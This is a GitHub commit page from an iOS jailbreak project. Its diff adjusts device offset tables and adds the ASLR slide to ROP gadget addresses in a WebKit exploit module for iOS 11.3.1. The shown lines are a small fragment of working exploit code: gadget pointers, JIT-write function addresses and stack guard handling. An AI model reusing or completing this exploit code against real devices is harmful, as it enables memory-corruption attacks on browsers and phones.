Skip to content

Commit

Permalink
git Merge branch 'master' of https://github.com/MTJailed/jailbreakme
Browse files Browse the repository at this point in the history
  • Loading branch information
MTJailed committed Jun 24, 2018
2 parents 8a98186 + a0ebd42 commit ec2bc60
Show file tree
Hide file tree
Showing 2 changed files with 6 additions and 6 deletions.
4 changes: 2 additions & 2 deletions modules/offsets.module.js
Original file line number Diff line number Diff line change
Expand Up @@ -75,8 +75,8 @@ var Offsets = function Offsets(sw_vers, productname) {
};

offsets["iPhone 8"][11.3] = offsets["iPhone 8"][11.31];
//offsets["iPhone 8+"][11.3] = offsets["iPhone 8"][11.31];
offsets["iPhone X"][11.3] = offsets["iPhone 8"][11.31];
offsets["iPhone 8+"][11.3] = offsets["iPhone 8"][11.31];
//offsets["iPhone X"][11.3] = offsets["iPhone 8"][11.31];
offsets["iPhone 8+"][11.31] = offsets["iPhone 8"][11.31];
//offsets["iPhone X"][11.31] = offsets["iPhone 8"][11.31];

Expand Down
8 changes: 4 additions & 4 deletions modules/sploit.1131.module.js
Original file line number Diff line number Diff line change
Expand Up @@ -266,9 +266,9 @@ var pwn = function() {
jitWriteSeparateHeapsFunction = stage2.read64(_off.jit_writeseperateheaps_func + slide)
useFastPermisionsJITCopy = stage2.read64(_off.usefastpermissions_jitcopy + slide)
ptr_stack_check_guard = _off.ptr_stack_check_guard + slide;
pop_x8 = _off.modelio_popx8;
pop_x2 = _off.coreaudio_popx2;
linkcode_gadget = _off.linkcode_gadget;
pop_x8 = _off.modelio_popx8 + slide;
pop_x2 = _off.coreaudio_popx2 + slide;
linkcode_gadget = _off.linkcode_gadget + slide;

if(verbosity >= VERBOSITY_HIGH) {
print('disablePrimitiveGigacage @ ' + hex(disablePrimitiveGigacage)
Expand Down Expand Up @@ -369,4 +369,4 @@ var wk113go = function() {
}
});
});
};
};

0 comments on commit ec2bc60

Please sign in to comment.